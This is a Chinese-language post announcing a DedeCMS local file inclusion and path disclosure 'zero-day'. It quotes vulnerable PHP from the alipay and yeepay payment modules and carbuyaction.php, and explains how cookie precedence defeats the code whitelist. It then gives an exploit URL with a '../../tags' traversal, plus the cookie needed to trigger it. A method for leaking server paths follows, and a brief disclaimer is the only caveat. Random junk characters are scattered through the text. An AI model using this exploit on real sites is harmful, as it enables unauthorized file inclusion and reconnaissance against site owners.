dedecms本地文件包含及物理路径泄露0day

admin

晚餐吃撑了，瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多，赶紧下了套，用editplus搜索了几个关键字，果然发现些问题。(话说平时写代码也喜欢用editplus，小巧方便多年习惯)
' N4 g0 i; A6 Z( A, C2 h. a
6 Y# Z/ G9 f1 z7 {出现漏洞的两个文件为：
- t1 v) U- ]; ~" u9 Q+ L4 ^/ P, Y9 uInclude/payment/alipay.php
: I& \( y: s( v2 `) vInclude/payment/yeepay.php
漏洞均出现在respond方法里，估计这两个文件是临时工写的。

" n& \+ [4 y! U! P! J6 C( bInclude/payment/alipay.php

% \' `9 s$ @/ n9 K' M......
   function respond()
  f% P3 [5 ?$ N5 v    {
        if (!empty($_POST))
6 F( j- ^7 i! T. o& f        {
5 V0 b( j4 h" h+ F) \$ T1 A2 E' t$ E            foreach($_POST as $key => $data)
9 h. [: @0 ~$ o9 \8 D2 Y$ ^, A- T            {
                $_GET[$key] = $data;
2 h% i# [1 I3 T( v            }
        }
% u& O% j$ G. ?: `8 U        /* 引入配置文件 */
. Y% I1 u  U8 _        require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';
8 I4 u. o& o1 y& k& Q$ M/ J5 X......

7 ~: U. r# Y) p& e
大概在133行左右，$_GET[‘code’]没有经过任何判断和过滤。
$ |) p5 q) K; Q) r( J# q
" D- e* E0 y9 |4 n4 cInclude/payment/yeepay.php
( o3 l* o. p/ C( g3 J0 J" d6 G/ i4 `


......
    function respond()
    {

% f7 @0 ?7 R; q+ i8 g/ _) N( N        /* 引入配置文件 */
8 j* Y- s4 d* ?6 A) J- t        require_once DEDEDATA.'/payment/'.$_REQUEST['code'].'.php';
2 {! F, V! z  M9 Z+ d7 g! A
        $p1_MerId = trim($payment['yp_account']);
9 i! t9 ?1 e$ F& e$ g        $merchantKey = trim($payment['yp_key']);
......
2 |5 J2 A5 \; H* d: M8 m
$ M, f) K3 n' A% @6 r4 x+ `


; n" |) D) Q7 z' g8 N( `" `4 p大概在145行左右，$_REQUEST['code']没有经过任何判断和过滤。
# i6 d) ?, n; E# y  i8 \# p
/ F& D; z4 p2 ]这两个方法在plus/carbuyaction.php文件调用。
) D1 ]$ {! L" y9 z) o1 l
plus/carbuyaction.php
& ?! C7 x7 O) z6 j- B& P  [2 W- b
! `9 R7 S- V, y* \5 z- G1 b- \......
$ \2 |: a% t, ]5 \0 g' K} else if ($dopost == 'return') {
1 \/ K& G$ Z. [/ A) m7 b    $write_list = array('alipay', 'bank', 'cod', 'yeepay');
% U6 P& I. m3 D; [% h    if (in_array($code, $write_list))
5 A( \4 p% u/ u& Q  {, |" y    {
        require_once DEDEINC.'/payment/'.$code.'.php';
1 S8 _3 t/ K  o' L/ O        $pay = new $code;
        $msg=$pay->respond();
# v7 O, Y8 w5 H* j0 _        ShowMsg($msg, "javascript:;", 0, 3000);
        exit();  
3 }; _: k/ p$ o  e  i0 i7 O4 R9 X    } else {
7 u: ~( ]2 m* z        exit('Error:File Type Can\'t Recognized!');
7 p  Z2 b! k. l/ {( {, H    }
& K6 [% Y2 O2 y+ K4 J3 X! Q# E7 D: H}
! }, d& {+ c$ v5 t( ?* M' U6 R......
- M+ g8 ?& ?2 |


" y. B9 J$ Z/ j4 h

4 e/ O7 ~: F- k3 G
. b- k5 N$ r8 f7 `* q大概在334行，当$dopost等于return的时候就开始进入过程了。熟悉dedecms朋友都知道在include/common.inc.php使用了一种类似register_globals的机制。
所以$_GET['code']或$_REQUEST['code']会变成$code，而$code是经过判断的，值必须在$write_list数组以内这样才能继续后面的流程调用respond方法触发漏洞。这样的话貌似就无法控制$_GET['code']为任意值了。
* T+ {' d$ p6 \: B' M/ ?* C
4 {# d- ~7 q* P1 y' l" G回到include/common.inc.php来看看他的机制。

% x' P6 x- O' v- Q* C- U
" ~" v3 |/ q2 c7 E
......
: X  a8 T3 ?0 [- M" Fforeach(Array('_GET','_POST','_COOKIE') as $_request)
{
        foreach($$_request as $_k => $_v)
, w' b8 M- q% `6 e        {
                if($_k == 'nvarname') ${$_k} = $_v;
0 D1 y: l) g7 b. y' @                else ${$_k} = _RunMagicQuotes($_v);
        }
}
. f1 j5 U; S+ F$ @, {6 t5 R# r......
. Y! h/ Y0 `5 L3 z/ ^. ?大概在79行，可以看到他是从$_GET,$_POST,$_COOKIE这三个全局变量里取值的。嘿嘿，细心点就发现了吧。从他这个优先机制来讲他是先从get再从post再从cookie也就是说最终$code会是以$_COOKIE[‘code’]的值为准，而我们要控制的是$_GET[‘code’]或$_REQUEST['code']只须要$code的值在$write_list数组以内就行了。Exp:http://www.php0day.com/plus/carb ... amp;code=../../tags上面的Exp是包含根目录下的tags.php文件包含其他后缀请自行构造截断，使用exp测试时须要自己添加一个code等于alipay或yeepay的cookie。暴路径:
由于bank和cod这两个文件并没有respond方法，所以如果code等于bank或者cod时将会暴错泄露路径。注：请勿非法测试，产生后果与本人无关。